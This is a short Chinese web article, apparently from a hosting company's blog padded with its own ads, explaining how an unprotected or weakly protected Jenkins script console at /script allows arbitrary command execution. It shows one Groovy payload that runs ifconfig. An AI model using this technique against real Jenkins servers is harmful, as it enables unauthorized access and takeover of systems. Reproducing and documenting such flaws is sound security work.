jenkins未授权访问-任意命令执行-创新互联

jenkins 未授权访问-任意命令执行

0x00 jenkins简介

enkins是一个功能强大的应用程序,允许持续集成和持续交付项目,无论用的是什么平台。这是一个免费的源代码,可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。Jenkins是一种软件允许持续集成。

创新互联是一家专注于成都网站设计、成都做网站、外贸网站建设与策划设计,栾城网站建设哪家好?创新互联做网站,专注于网站建设十多年,网设计领域的专业建站公司;建站业务涵盖:栾城等地区。栾城做网站价格咨询:18980820575

0x01 漏洞原因

jenkins 未设置帐号密码,或者使用了弱帐号密码

0x02 漏洞复现

在默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,×××者可通过未授权访问漏洞或者暴力破解用户密码等进脚本执行界面从而获取服务器权限。
任意命令执行界面:
http://ip:port/script

println "ifconfig".execute().text

jenkins 未授权访问-任意命令执行

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


网站名称:jenkins未授权访问-任意命令执行-创新互联
网页URL:http://hbruida.cn/article/jpghs.html